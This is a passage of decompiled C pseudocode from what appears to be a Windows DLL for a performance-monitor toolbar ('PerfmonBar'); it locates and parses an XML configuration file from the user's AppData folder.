																																																							L497:
																																																							_t951 = _v36;
																																																							L494:
																																																							_v20 = 0x11;
																																																							__eflags = _t951;
																																																							if(_t951 != 0) {
																																																								 *((intOrPtr*)( *_t951 + 8))(_t951);
																																																							}
																																																							L499:
																																																							_v20 = 0x12;
																																																							_t1433 = _v40;
																																																							__eflags = _t1433;
																																																							if(_t1433 != 0) {
																																																								 *((intOrPtr*)( *_t1433 + 8))(_t1433);
																																																							}
																																																							 *[fs:0x0] = _v28;
																																																							__eflags = _v32 ^ _t1672;
																																																							return E6E7E440A(_v32 ^ _t1672);
																																																						} else {
																																																							_v48 = 0;
																																																							_v20 = 8;
																																																							_t955 = _v36;
																																																							__eflags = _t955;
																																																							if(_t955 == 0) {
																																																								goto L502;
																																																							} else {
																																																								_t1393 =  *_t955;
																																																								_t956 =  *((intOrPtr*)(_t1393 + 0x1c))(_t955,  &_v48);
																																																								__eflags = _t956;
																																																								if(_t956 < 0) {
																																																									L496:
																																																									 *_t1360(_v48);
																																																									goto L497;
																																																								} else {
																																																									_t958 = _v36;
																																																									__eflags = _t958;
																																																									if(_t958 == 0) {
																																																										goto L502;
																																																									} else {
																																																										_t1589 =  &_v88;
																																																										__eflags =  *((intOrPtr*)( *_t958 + 0x20))(_t958,  &_v88);
																																																										if(__eflags < 0) {
																																																											goto L496;
																																																										} else {
																																																											_t1393 =  &_v44;
																																																											_v44 = 0;
																																																											E6E7D8390(_t1393,  &_v88, __eflags, _v48);
																																																											_v20 = 0xd;
																																																											__imp__#8( &_v72);
																																																											_t832 =  &_v72;
																																																											__imp__#10(_t832,  &_v88);
																																																											__eflags = _t832;
																																																											if(__eflags < 0) {
																																																												L504:
																																																												E6E7E7D20(_t832);
																																																												asm("int3");
																																																												asm("int3");
																																																												asm("int3");
																																																												asm("int3");
																																																												asm("int3");
																																																												asm("int3");
																																																												asm("int3");
																																																												asm("int3");
																																																												asm("int3");
																																																												asm("int3");
																																																												asm("int3");
																																																												asm("int3");
																																																												asm("int3");
																																																												asm("int3");
																																																												asm("int3");
																																																												_t1361 = _t1692;
																																																												_t1695 = (_t1692 - 0x00000008 & 0xfffffff8) + 4;
																																																												_v668 =  *((intOrPtr*)(_t1361 + 4));
																																																												_t1674 = _t1695;
																																																												_t835 =  *0x6e81e008; // 0x77dcee0d
																																																												_t836 = _t835 ^ _t1674;
																																																												_v692 = _t836;
																																																												 *[fs:0x0] =  &_v684;
																																																												_t1619 = _t1393;
																																																												_v1220 = _t1619;
																																																												E6E7E8BE0(_t1602,  &_v1216, 0, 0x208);
																																																												_t1697 = _t1695 - 0x258 + 0xc;
																																																												_t840 =  &_v1216;
																																																												__imp__SHGetFolderPathW(0, 0x1a, 0, 0, _t840, _t836, _t1602, _t1617, _t1361,  *[fs:0x0], E6E808EFB, 0xffffffff, _t1672, _t1360);
																																																												__eflags = _t840;
																																																												if(_t840 < 0) {
																																																													L522:
																																																													 *[fs:0x0] = _v40;
																																																													__eflags = _v48 ^ _t1674;
																																																													return E6E7E440A(_v48 ^ _t1674);
																																																												} else {
																																																													__eflags = 0;
																																																													_v588 = 0;
																																																													_t1398 =  &_v572;
																																																													_v584 = 7;
																																																													_v604 = 0;
																																																													_t1576 = _t1398 + 2;
																																																													do {
																																																														_t843 =  *_t1398;
																																																														_t1398 = _t1398 + 2;
																																																														__eflags = _t843;
																																																													} while (_t843 != 0);
																																																													_push(_t1398 - _t1576 >> 1);
																																																													E6E7DBC80(_t1361,  &_v604, _t1602, _t1619, _t1736,  &_v572);
																																																													_v32 = 0;
																																																													_t1577 = _v584;
																																																													_t1402 = _v588;
																																																													__eflags = _t1577 - _t1402 - 0x16;
																																																													if(_t1577 - _t1402 < 0x16) {
																																																														_push(0x16);
																																																														_v576 = 0;
																																																														_t848 = E6E7DD150(_t1361,  &_v604, _t1602, _t1619, 0x16, _v576, L"\\PerfmonBar\\config.xml");
																																																													} else {
																																																														__eflags = _t1577 - 8;
																																																														_t1629 =  >=  ? _v604 :  &_v604;
																																																														_t1602 = _t1402 + 0x16;
																																																														_v588 = _t1602;
																																																														E6E7E9330(_t1629 + _t1402 * 2, L"\\PerfmonBar\\config.xml", 0x2c);
																																																														_t1697 = _t1697 + 0xc;
																																																														 *((short*)(_t1629 + _t1602 * 2)) = 0;
																																																														_t848 =  &_v604;
																																																														_t1619 = _v576;
																																																													}
																																																													asm("movups xmm0, [eax]");
																																																													asm("movups [ebp-0x268], xmm0");
																																																													asm("movups [ebp-0x258], xmm0");
																																																													asm("movq xmm0, [eax+0x10]");
																																																													 *(_t848 + 0x10) = 0;
																																																													 *(_t848 + 0x14) = 7;
																																																													 *_t848 = 0;
																																																													asm("movq [ebp-0x228], xmm0");
																																																													asm("movq [ebp-0x248], xmm0");
																																																													__eflags = _t1619 -  &_v628;
																																																													if(_t1619 ==  &_v628) {
																																																														_t1578 = _v608;
																																																														__eflags = _t1578 - 8;
																																																														if(_t1578 < 8) {
																																																															goto L517;
																																																														} else {
																																																															_t1431 = _v628;
																																																															_t1584 = 2 + _t1578 * 2;
																																																															_t936 = _t1431;
																																																															__eflags = _t1584 - 0x1000;
																																																															if(_t1584 < 0x1000) {
																																																																L516:
																																																																_push(_t1584);
																																																																E6E7E441B(_t1431);
																																																																_t1697 = _t1697 + 8;
																																																																goto L517;
																																																															} else {
																																																																_t1405 =  *((intOrPtr*)(_t1431 - 4));
																																																																_t1580 = _t1584 + 0x23;
																																																																__eflags = _t936 - _t1405 + 0xfffffffc - 0x1f;
																																																																if(__eflags > 0) {
																																																																	E6E7EE5E6(_t1361, _t1405, _t1580, _t1602, __eflags);
																																																																	goto L524;
																																																																} else {
																																																																	goto L516;
																																																																}
																																																															}
																																																														}
																																																													} else {
																																																														L46();
																																																														asm("movups xmm0, [ebp-0x268]");
																																																														asm("movups [esi], xmm0");
																																																														asm("movq xmm0, [ebp-0x228]");
																																																														asm("movq [esi+0x10], xmm0");
																																																														L517:
																																																														_t1579 = _v584;
																																																														__eflags = _t1579 - 8;
																																																														if(_t1579 < 8) {
																																																															L521:
																																																															__eflags = 0;
																																																															goto L522;
																																																														} else {
																																																															_t1405 = _v604;
																																																															_t1580 = 2 + _t1579 * 2;
																																																															_t851 = _t1405;
																																																															__eflags = _t1580 - 0x1000;
																																																															if(_t1580 < 0x1000) {
																																																																L520:
																																																																_push(_t1580);
																																																																E6E7E441B(_t1405);
																																																																goto L521;
																																																															} else {
																																																																_t1405 =  *((intOrPtr*)(_t1405 - 4));
																																																																_t1580 = _t1580 + 0x23;
																																																																__eflags = _t851 - _t1405 + 0xfffffffc - 0x1f;
																																																																if(__eflags > 0) {
																																																																	L524:
																																																																	E6E7EE5E6(_t1361, _t1405, _t1580, _t1602, __eflags);
																																																																	asm("int3");
																																																																	asm("int3");
																																																																	asm("int3");
																																																																	asm("int3");
																																																																	asm("int3");
																																																																	asm("int3");
																																																																	asm("int3");
																																																																	asm("int3");
																																																																	asm("int3");
																																																																	asm("int3");
																																																																	_push(_t1361);
																																																																	_t1363 = _t1697;
																																																																	_t1703 = (_t1697 - 0x00000008 & 0xfffffff8) + 4;
																																																																	_push(_t1674);
																																																																	_v1336 =  *((intOrPtr*)(_t1363 + 4));
																																																																	_t1677 = _t1703;
																																																																	_push(0xffffffff);
																																																																	_push(E6E808F70);
																																																																	_push( *[fs:0x0]);
																																																																	_push(_t1363);
																																																																	_t1704 = _t1703 - 0x50;
																																																																	_t857 =  *0x6e81e008; // 0x77dcee0d
																																																																	_t858 = _t857 ^ _t1677;
																																																																	_v1360 = _t858;
																																																																	_push(_t1619);
																																																																	_push(_t1602);
																																																																	_push(_t858);
																																																																	_t859 =  &_v1352;
																																																																	 *[fs:0x0] = _t859;
																																																																	_t1621 = _t1405;
																																																																	_v1368 = _t1621;
																																																																	__eflags =  *0x6e8204d8;
																																																																	if( *0x6e8204d8 == 0) {
																																																																		__imp__CoInitialize(0);
																																																																		__eflags = _t859;
																																																																		_t1580 =  >=  ? 1 :  *0x6e8204d8 & 0x000000ff;
																																																																		 *0x6e8204d8 =  >=  ? 1 :  *0x6e8204d8 & 0x000000ff;
																																																																	}
																																																																	_v44 = 0;
																																																																	E6E7DBA60(_t1363, _t1621 + 4, _t1580, _t1736);
																																																																	__eflags =  *((intOrPtr*)(_t1621 + 0x14)) -  *((intOrPtr*)(_t1621 + 0xc)) >> 2 - 0x10;
																																																																	if( *((intOrPtr*)(_t1621 + 0x14)) -  *((intOrPtr*)(_t1621 + 0xc)) >> 2 < 0x10) {
																																																																		E6E7DC0A0(_t1621 + 0xc, _t1580, _t1736, 0x10);
																																																																	}
																																																																	_v120 =  *((intOrPtr*)(_t1621 + 4));
																																																																	E6E7DBDD0(_t1363, _t1621 + 0xc, _t1602, _t1621, _t1736, 0x10,  &_v120);
																																																																	_t867 = _t1621 + 0x20;
																																																																	 *(_t1621 + 0x18) = 7;
																																																																	 *(_t1621 + 0x1c) = 8;
																																																																	_t1604 = _t867[1];
																																																																	_t1622 =  *_t867;
																																																																	_v120 = _t867;
																																																																	__eflags = _t1622 - _t1604;
																																																																	if(_t1622 != _t1604) {
																																																																		do {
																																																																			E6E7DBB80(_t1363, _t1622 + 4, _t1604, _t1622, _t1736);
																																																																			_t1622 = _t1622 + 0x10;
																																																																			__eflags = _t1622 - _t1604;
																																																																		} while (_t1622 != _t1604);
																																																																		_t867 = _v120;
																																																																		_t1622 =  *_t867;
																																																																	}
																																																																	_t867[1] = _t1622;
																																																																	_v76 = 0;
																																																																	_t868 =  &_v112;
																																																																	_v44 = 2;
																																																																	__imp__CoCreateInstance(0x6e80a3a0, 0, 0x17, 0x6e817bdc, _t868);
																																																																	_t1623 = _t868;
																																																																	__eflags = _t1623;
																																																																	if(_t1623 < 0) {
																																																																		L536:
																																																																		_t869 = 0;
																																																																		_v76 = 0;
																																																																		__eflags = _t1623;
																																																																		if(_t1623 >= 0) {
																																																																			goto L538;
																																																																		} else {
																																																																			_v113 = 0;
																																																																			goto L588;
																																																																		}
																																																																	} else {
																																																																		__imp__OleRun(_v112);
																																																																		_t1623 = _t868;
																																																																		__eflags = _t1623;
																																																																		if(_t1623 >= 0) {
																																																																			_t1427 = _v112;
																																																																			_t1582 =  &_v76;
																																																																			_t1623 =  *((intOrPtr*)( *_t1427))(_t1427, 0x6e817bcc,  &_v76);
																																																																		}
																																																																		_t930 = _v112;
																																																																		 *((intOrPtr*)( *_t930 + 8))(_t930);
																																																																		__eflags = _t1623;
																																																																		if(_t1623 >= 0) {
																																																																			L538:
																																																																			_v92 = 0;
																																																																			_v88 = 7;
																																																																			_v108 = 0;
																																																																			_v44 = 5;
																																																																			L505();
																																																																			__eflags = 0;
																																																																			if(0 != 0) {
																																																																				L582:
																																																																				_v113 = 0;
																																																																				goto L583;
																																																																			} else {
																																																																				_t1623 = _v76;
																																																																				__eflags = _t1623;
																																																																				if(__eflags == 0) {
																																																																					L591:
																																																																					E6E7E7D20(0x80004003);
																																																																					goto L592;
																																																																				} else {
																																																																					__eflags = _v88 - 8;
																																																																					_t1604 =  >=  ? _v108 :  &_v108;
																																																																					_v120 =  *((intOrPtr*)( *_t1623 + 0xe8));
																																																																					_v136 = 8;
																																																																					__imp__#2(_t1604);
																																																																					_v128 = 8;
																																																																					__eflags = 8;
																																																																					if(8 != 0) {
																																																																						L542:
																																																																						_v44 = 7;
																																																																						asm("movups xmm0, [ebp-0x60]");
																																																																						_t1704 = _t1704 - 0x10;
																																																																						asm("movups [eax], xmm0");
																																																																						_t1623 = _v120(_t1623,  &_v84);
																																																																						__imp__#9( &_v136);
																																																																						__eflags = _t1623;
																																																																						if(_t1623 != 0) {
																																																																							goto L582;
																																																																						} else {
																																																																							_v72 = _t1623;
																																																																							_v44 = 9;
																																																																							_t899 = _v76;
																																																																							__eflags = _t899;
																																																																							if(__eflags == 0) {
																																																																								goto L593;
																																																																							} else {
																																																																								_t1414 =  *_t899;
																																																																								_t1582 =  &_v72;
																																																																								_v44 = 9;
																																																																								_v72 = _t1623;
																																																																								_t900 = _t1414[0x2d](_t899,  &_v72);
																																																																								__eflags = _t900;
																																																																								if(_t900 >= 0) {
																																																																									_v80 = 0;
																																																																									_v44 = 0xd;
																																																																									_t901 = _v72;
																																																																									__eflags = _t901;
																																																																									if(__eflags == 0) {
																																																																										goto L594;
																																																																									} else {
																																																																										_t1582 =  &_v80;
																																																																										_t902 =  *((intOrPtr*)( *_t901 + 0x1c))(_t901,  &_v80);
																																																																										_t1623 = __imp__#6;
																																																																										__eflags = _t902;
																																																																										if(_t902 >= 0) {
																																																																											_t1414 =  &_v80;
																																																																											_t903 = E6E7D8220(_t1363, _t1414, _t1604, _t1623, "perfbar");
																																																																											__eflags = _t903;
																																																																											if(_t903 == 0) {
																																																																												L573:
																																																																												_v113 = 1;
																																																																												goto L574;
																																																																											} else {
																																																																												_v64 = 0;
																																																																												_v44 = 0x10;
																																																																												_t1623 = _v72;
																																																																												__eflags = _t1623;
																																																																												if(__eflags == 0) {
																																																																													goto L595;
																																																																												} else {
																																																																													_t907 =  *_t1623;
																																																																													_t1414 =  &_v64;
																																																																													_t1604 =  *(_t907 + 0x34);
																																																																													L597();
																																																																													 *( *(_t907 + 0x34))(_t1623, _t907);
																																																																													_t909 = _v64;
																																																																													_t1623 = __imp__#6;
																																																																													__eflags = _t909;
																																																																													if(_t909 == 0) {
																																																																														L571:
																																																																														_v44 = 0x1e;
																																																																														__eflags = _t909;
																																																																														if(_t909 != 0) {
																																																																															 *((intOrPtr*)( *_t909 + 8))(_t909);
																																																																														}
																																																																														goto L573;
																																																																													} else {
																																																																														_t1604 = _v68;
																																																																														while(1) {
																																																																															_v112 = 0;
																																																																															_v44 = 0x11;
																																																																															__eflags = _t909;
																																																																															if(__eflags == 0) {
																																																																																goto L591;
																																																																															}
																																																																															_t1582 =  &_v112;
																																																																															_t911 =  *((intOrPtr*)( *_t909 + 0x1c))(_t909,  &_v112);
																																																																															__eflags = _t911;
																																																																															if(_t911 < 0) {
																																																																																L579:
																																																																																 *_t1623(_v112);
																																																																																_v44 = 0x18;
																																																																																_t913 = _v64;
																																																																																__eflags = _t913;
																																																																																if(_t913 != 0) {
																																																																																	 *((intOrPtr*)( *_t913 + 8))(_t913);
																																																																																}
																																																																																_v113 = 0;
																																																																																goto L574;
																																																																															} else {
																																																																																_t915 = E6E7D8220(_t1363,  &_v112, _t1604, _t1623, "counters");
																																																																																__eflags = _t915;
																																																																																if(_t915 == 0) {
																																																																																	_t916 = E6E7D8220(_t1363,  &_v112, _t1604, _t1623, "pages");
																																																																																	__eflags = _t916;
																																																																																	if(_t916 == 0) {
																																																																																		_t1414 =  &_v112;
																																																																																		_t917 = E6E7D8220(_t1363, _t1414, _t1604, _t1623, "settings");
																																																																																		__eflags = _t917;
																																																																																		if(_t917 != 0) {
																																																																																			_t1582 = _t1604 + 0x2c;
																																																																																			_t1414 =  &_v64;
																																																																																			L423();
																																																																																		}
																																																																																	} else {
																																																																																		_t1582 = _t1604 + 0x20;
																																																																																		_t1414 =  &_v64;
																																																																																		E6E7D8F80(_t1363, _t1414, _t1604 + 0x20, _t1604, _t1623, _t1736);
																																																																																	}
																																																																																} else {
																																																																																	_t1582 = _t1604;
																																																																																	_t1414 =  &_v64;
																																																																																	E6E7D8BD0(_t1363, _t1414, _t1604, _t1604, _t1623, _t1736);
																																																																																}
																																																																																_v68 = 0;
																																																																																_v44 = 0x15;
																																																																																_t918 = _v64;
																																																																																__eflags = _t918;
																																																																																if(__eflags == 0) {
																																																																																	goto L591;
																																																																																} else {
																																																																																	_t1414 =  *_t918;
																																																																																	_t1582 =  &_v68;
																																																																																	_v44 = 0x15;
																																																																																	_v68 = 0;
																																																																																	_t919 = _t1414[0x10](_t918,  &_v68);
																																																																																	__eflags = _t919;
																																																																																	if(_t919 < 0) {
																																																																																		_v44 = 0x17;
																																																																																		_t920 = _v68;
																																																																																		__eflags = _t920;
																																																																																		if(_t920 != 0) {
																																																																																			 *((intOrPtr*)( *_t920 + 8))(_t920);
																																																																																		}
																																																																																		goto L579;
																																																																																	} else {
																																																																																		_t1627 = _v64;
																																																																																		_t922 = _v68;
																																																																																		__eflags = _t1627 - _t922;
																																																																																		if(_t1627 != _t922) {
																																																																																			_v64 = _t922;
																																																																																			_v44 = 0x1c;
																																																																																			__eflags = _t922;
																																																																																			if(_t922 != 0) {
																																																																																				_t1414 =  *_t922;
																																																																																				_t1414[1](_t922);
																																																																																				_t922 = _v68;
																																																																																			}
																																																																																			_v44 = 0x1b;
																																																																																			__eflags = _t1627;
																																																																																			if(_t1627 != 0) {
																																																																																				 *((intOrPtr*)( *_t1627 + 8))(_t1627);
																																																																																				_t922 = _v68;
																																																																																			}
																																																																																		}
																																																																																		_v44 = 0x1d;
																																																																																		__eflags = _t922;
																																																																																		if(_t922 != 0) {
																																																																																			_t1414 =  *_t922;
																																																																																			_t1414[2](_t922);
																																																																																		}
																																																																																		_t1623 = __imp__#6;
																																																																																		 *_t1623(_v112);
																																																																																		_t909 = _v64;
																																																																																		__eflags = _t909;
																																																																																		if(_t909 != 0) {
																																																																																			continue;
																																																																																		} else {
																																																																																			goto L571;
																																																																																		}
																																																																																	}
																																																																																}
																																																																															}
																																																																															goto L600;
																																																																														}
																																																																														goto L591;
																																																																													}
																																																																												}
																																																																											}
																																																																										} else {
																																																																											_v113 = 0;
																																																																											L574:
																																																																											 *_t1623(_v80);
																																																																											goto L575;
																																																																										}
																																																																									}
																																																																								} else {
																																																																									_v113 = 0;
																																																																									L575:
																																																																									_v44 = 0x1f;
																																																																									_t905 = _v72;
																																																																									__eflags = _t905;
																																																																									if(_t905 != 0) {
																																																																										 *((intOrPtr*)( *_t905 + 8))(_t905);
																																																																									}
																																																																									L583:
																																																																									_v44 = 1;
																																																																									_t1581 = _v88;
																																																																									__eflags = _t1581 - 8;
																																																																									if(_t1581 < 8) {
																																																																										L587:
																																																																										__eflags = 0;
																																																																										_v92 = 0;
																																																																										_v108 = 0;
																																																																										_t869 = _v76;
																																																																										_v88 = 7;
																																																																										L588:
																																																																										_v44 = 0x20;
																																																																										__eflags = _t869;
																																																																										if(_t869 != 0) {
																																																																											 *((intOrPtr*)( *_t869 + 8))(_t869);
																																																																										}
																																																																										 *[fs:0x0] = _v52;
																																																																										__eflags = _v60 ^ _t1677;
																																																																										return E6E7E440A(_v60 ^ _t1677);
																																																																									} else {
																																																																										_t1414 = _v108;
																																																																										_t1582 = 2 + _t1581 * 2;
																																																																										_t875 = _t1414;
																																																																										__eflags = _t1582 - 0x1000;
																																																																										if(_t1582 < 0x1000) {
																																																																											L586:
																																																																											_push(_t1582);
																																																																											E6E7E441B(_t1414);
																																																																											goto L587;
																																																																										} else {
																																																																											_t1414 =  *(_t1414 - 4);
																																																																											_t1582 = _t1582 + 0x23;
																																																																											__eflags = _t875 - _t1414 + 0xfffffffc - 0x1f;
																																																																											if(__eflags > 0) {
																																																																												goto L596;
																																																																											} else {
																																																																												goto L586;
																																																																											}
																																																																										}
																																																																									}
																																																																								}
																																																																							}
																																																																						}
																																																																					} else {
																																																																						__eflags = _t1604;
																																																																						if(__eflags != 0) {
																																																																							L592:
																																																																							E6E7E7D20(0x8007000e);
																																																																							L593:
																																																																							E6E7E7D20(0x80004003);
																																																																							L594:
																																																																							E6E7E7D20(0x80004003);
																																																																							L595:
																																																																							E6E7E7D20(0x80004003);
																																																																							L596:
																																																																							E6E7EE5E6(_t1363, _t1414, _t1582, _t1604, __eflags);
																																																																							asm("int3");
																																																																							asm("int3");
																																																																							asm("int3");
																																																																							asm("int3");
																																																																							asm("int3");
																																																																							asm("int3");
																																																																							asm("int3");
																																																																							asm("int3");
																																																																							asm("int3");
																																																																							_push(_t1677);
																																																																							_push(0xffffffff);
																																																																							_push(E6E808FA0);
																																																																							_push( *[fs:0x0]);
																																																																							_push(_t1623);
																																																																							_t881 =  *0x6e81e008; // 0x77dcee0d
																																																																							_push(_t881 ^ _t1704);
																																																																							 *[fs:0x0] =  &_v1476;
																																																																							_t1625 = _t1414;
																																																																							_v1468 = 0;
																																																																							_t1415 =  *_t1625;
																																																																							__eflags = _t1415;
																																																																							if(_t1415 != 0) {
																																																																								 *((intOrPtr*)( *_t1415 + 8))(_t1415);
																																																																							}
																																																																							 *_t1625 = 0;
																																																																							 *[fs:0x0] = _v56;
																																																																							return _t1625;
																																																																						} else {
																																																																							goto L542;
																																																																						}
																																																																					}
																																																																				}
																																																																			}
																																																																		} else {
																																																																			goto L536;
																																																																		}
																																																																	}
																																																																} else {
																																																																	goto L520;
																																																																}
																																																															}
																																																														}
																																																													}
																																																												}
																																																											} else {
																																																												_v20 = 0xe;
																																																												_t963 = E6E7D82F0(_t1360,  &_v100,  &_v88, __eflags, "minSizeX");
																																																												_t1441 =  &_v44;
																																																												_t964 = E6E7D85E0(_t1441, _t963);
																																																												_t1631 = _v100;
																																																												_t1367 = _t964;
																																																												__eflags = _t1631;
																																																												if(_t1631 == 0) {
																																																													_t1602 = __imp__#6;
																																																												} else {
																																																													asm("lock xadd [esi+0x8], ecx");
																																																													__eflags = (_t1441 | 0xffffffff) != 1;
																																																													if((_t1441 | 0xffffffff) != 1) {
																																																														L446:
																																																														_t1602 = __imp__#6;
																																																														_v100 = 0;
																																																													} else {
																																																														__eflags = _t1631;
																																																														if(_t1631 == 0) {
																																																															goto L446;
																																																														} else {
																																																															_t1003 =  *_t1631;
																																																															_t1602 = __imp__#6;
																																																															__eflags = _t1003;
																																																															if(_t1003 != 0) {
																																																																 *_t1602(_t1003);
																																																																 *_t1631 = 0;
																																																															}
																																																															_t1004 =  *(_t1631 + 4);
																																																															__eflags = _t1004;
																																																															if(_t1004 != 0) {
																																																																E6E7E447C(_t1004);
																																																																_t1692 = _t1692 + 4;
																																																																 *(_t1631 + 4) = 0;
																																																															}
																																																															_push(0xc);
																																																															E6E7E441B(_t1631);
																																																															_t1692 = _t1692 + 8;
																																																															_v100 = 0;
																																																														}
																																																													}
																																																												}
																																																												__eflags = _t1367;
																																																												if(__eflags != 0) {
																																																													_push( &_v72);
																																																													_t1449 =  &_v104;
																																																													_t993 = E6E7D8730(_t1367,  &_v104, _t1589, _t1602, _t1631, _t1736);
																																																													_v20 = 0xf;
																																																													_t1636 =  *_t993;
																																																													__eflags = _t1636;
																																																													if(_t1636 == 0) {
																																																														_t994 = 0;
																																																														__eflags = 0;
																																																													} else {
																																																														_t994 =  *(_t1636 + 4);
																																																														__eflags = _t994;
																																																														if(_t994 == 0) {
																																																															 *(_t1636 + 4) = E6E7E7D40(_t1367,  *_t1636);
																																																														}
																																																													}
																																																													_t995 = E6E7F50D9(_t1449, _t994);
																																																													_t1692 = _t1692 + 4;
																																																													_v20 = 0xe;
																																																													_t1637 = _v104;
																																																													 *_v112 = _t995;
																																																													__eflags = _t1637;
																																																													if(__eflags != 0) {
																																																														asm("lock xadd [esi+0x8], eax");
																																																														__eflags = (_t995 | 0xffffffff) - 1;
																																																														if(__eflags == 0) {
																																																															__eflags = _t1637;
																																																															if(__eflags != 0) {
																																																																_t998 =  *_t1637;
																																																																__eflags = _t998;
																																																																if(_t998 != 0) {
																																																																	 *_t1602(_t998);
																																																																	 *_t1637 = 0;
																																																																}
																																																																_t999 =  *(_t1637 + 4);
																																																																__eflags =  *(_t1637 + 4);
																																																																if(__eflags != 0) {
																																																																	E6E7E447C(_t999);
																																																																	_t1692 = _t1692 + 4;
																																																																	 *(_t1637 + 4) = 0;
																																																																}
																																																																_push(0xc);
																																																																E6E7E441B(_t1637);
																																																																_t1692 = _t1692 + 8;
																																																															}
																																																														}
																																																														_v104 = 0;
																																																													}
																																																												}
																																																												_t965 = E6E7D82F0(_t1367,  &_v108, _t1589, __eflags, "minSizeY");
																																																												_t1443 =  &_v44;
																																																												_t966 = E6E7D85E0(_t1443, _t965);
																																																												_t1632 = _v108;
																																																												_t1368 = _t966;
																																																												__eflags = _t1632;
																																																												if(_t1632 != 0) {
																																																													asm("lock xadd [esi+0x8], ecx");
																																																													__eflags = (_t1443 | 0xffffffff) == 1;
																																																													if((_t1443 | 0xffffffff) == 1) {
																																																														__eflags = _t1632;
																																																														if(_t1632 != 0) {
																																																															_t987 =  *_t1632;
																																																															__eflags = _t987;
																																																															if(_t987 != 0) {
																																																																 *_t1602(_t987);
																																																																 *_t1632 = 0;
																																																															}
																																																															_t988 =  *(_t1632 + 4);
																																																															__eflags = _t988;
																																																															if(_t988 != 0) {
																																																																E6E7E447C(_t988);
																																																																_t1692 = _t1692 + 4;
																																																																 *(_t1632 + 4) = 0;
																																																															}
																																																															_push(0xc);
																																																															E6E7E441B(_t1632);
																																																															_t1692 = _t1692 + 8;
																																																														}
																																																													}
																																																													_v108 = 0;
																																																												}
																																																												__eflags = _t1368;
																																																												if(_t1368 != 0) {
																																																													_push( &_v72);
																																																													_t1445 =  &_v116;
																																																													_t977 = E6E7D8730(_t1368,  &_v116, _t1589, _t1602, _t1632, _t1736);
																																																													_v20 = 0x10;
																																																													_t1634 =  *_t977;
																																																													__eflags = _t1634;
																																																													if(_t1634 == 0) {
																																																														_t978 = 0;
																																																														__eflags = 0;
																																																													} else {
																																																														_t978 =  *(_t1634 + 4);
																																																														__eflags = _t978;
																																																														if(_t978 == 0) {
																																																															 *(_t1634 + 4) = E6E7E7D40(_t1368,  *_t1634);
																																																														}
																																																													}
																																																													_t979 = E6E7F50D9(_t1445, _t978);
																																																													_t1692 = _t1692 + 4;
																																																													_t1635 = _v116;
																																																													 *(_v112 + 4) = _t979;
																																																													__eflags = _t1635;
																																																													if(_t1635 != 0) {
																																																														asm("lock xadd [esi+0x8], eax");
																																																														__eflags = (_t979 | 0xffffffff) == 1;
																																																														if((_t979 | 0xffffffff) == 1) {
																																																															__eflags = _t1635;
																																																															if(_t1635 != 0) {
																																																																_t982 =  *_t1635;
																																																																__eflags = _t982;
																																																																if(_t982 != 0) {
																																																																	 *_t1602(_t982);
																																																																	 *_t1635 = 0;
																																																																}
																																																																_t983 =  *(_t1635 + 4);
																																																																__eflags = _t983;
																																																																if(_t983 != 0) {
																																																																	E6E7E447C(_t983);
																																																																	_t1692 = _t1692 + 4;
																																																																	 *(_t1635 + 4) = 0;
																																																																}
																																																																_push(0xc);
																																																																E6E7E441B(_t1635);
																																																																_t1692 = _t1692 + 8;
																																																															}
																																																														}
																																																														_v116 = 0;
																																																													}
																																																												}
																																																												_t967 =  &_v72;
																																																												__imp__#9(_t967);
																																																												_t1633 = _v44;
																																																												__eflags = _t1633;
																																																												if(_t1633 != 0) {
																																																													asm("lock xadd [esi+0x8], eax");
																																																													__eflags = (_t967 | 0xffffffff) == 1;
																																																													if((_t967 | 0xffffffff) == 1) {
																																																														_t971 =  *_t1633;
																																																														__eflags = _t971;
																																																														if(_t971 != 0) {
																																																															 *_t1602(_t971);
																																																															 *_t1633 = 0;
																																																														}
																																																														_t972 =  *(_t1633 + 4);
																																																														__eflags = _t972;
																																																														if(_t972 != 0) {
																																																															E6E7E447C(_t972);
																																																															_t1692 = _t1692 + 4;
																																																															 *(_t1633 + 4) = 0;
																																																														}
																																																														_push(0xc);
																																																														E6E7E441B(_t1633);
																																																														_t1692 = _t1692 + 8;
																																																													}
																																																												}
																																																												_v20 = 4;
																																																												_t1360 = __imp__#6;
																																																												 *_t1360(_v48);
																																																												_t951 = _v36;
																																																												_t1393 = _v96 + 1;
																																																												_v96 = _t1393;
																																																												__eflags = _t1393 - _v52;
																																																												if(_t1393 < _v52) {
																																																													continue;
																																																												} else {
																																																													goto L493;
																																																												}
																																																											}
																																																										}
																																																									}
																																																								}
																																																							}
																																																						}
																																																						goto L600;
																																																					}
																																																					goto L502;
																																																				}
																																																			}
																																																		}
																																																	}
																																																}
																																															} else {
																																																_v16 = 0xe;
																																																_t1028 = E6E7D82F0(_t1360,  &_v100, _t1575, __eflags, "prefix");
																																																_t1461 =  &_v32;
																																																_t1029 = E6E7D85E0(_t1461, _t1028);
																																																_t1639 = _v100;
																																																_t1371 = _t1029;
																																																__eflags = _t1639;
																																																if(_t1639 == 0) {
																																																	_t1602 = __imp__#6;
																																																} else {
																																																	asm("lock xadd [esi+0x8], ecx");
																																																	__eflags = (_t1461 | 0xffffffff) != 1;
																																																	if((_t1461 | 0xffffffff) != 1) {
																																																		L281:
																																																		_t1602 = __imp__#6;
																																																		_v100 = 0;
																																																	} else {
																																																		__eflags = _t1639;
																																																		if(_t1639 == 0) {
																																																			goto L281;
																																																		} else {
																																																			_t1141 =  *_t1639;
																																																			_t1602 = __imp__#6;
																																																			__eflags = _t1141;
																																																			if(_t1141 != 0) {
																																																				 *_t1602(_t1141);
																																																				 *_t1639 = 0;
																																																			}
																																																			_t1142 =  *(_t1639 + 4);
																																																			__eflags = _t1142;
																																																			if(_t1142 != 0) {
																																																				E6E7E447C(_t1142);
																																																				_t1691 = _t1691 + 4;
																																																				 *(_t1639 + 4) = 0;
																																																			}
																																																			_push(0xc);
																																																			E6E7E441B(_t1639);
																																																			_t1691 = _t1691 + 8;
																																																			_v100 = 0;
																																																		}
																																																	}
																																																}
																																																__eflags = _t1371;
																																																if(__eflags == 0) {
																																																	_t1030 = E6E7D82F0(_t1371,  &_v108, _t1575, __eflags, "suffix");
																																																	_t1463 =  &_v32;
																																																	_t1031 = E6E7D85E0(_t1463, _t1030);
																																																	_t1640 = _v108;
																																																	_t1372 = _t1031;
																																																	__eflags = _t1640;
																																																	if(_t1640 != 0) {
																																																		asm("lock xadd [esi+0x8], ecx");
																																																		__eflags = (_t1463 | 0xffffffff) == 1;
																																																		if((_t1463 | 0xffffffff) == 1) {
																																																			__eflags = _t1640;
																																																			if(_t1640 != 0) {
																																																				_t1125 =  *_t1640;
																																																				__eflags = _t1125;
																																																				if(_t1125 != 0) {
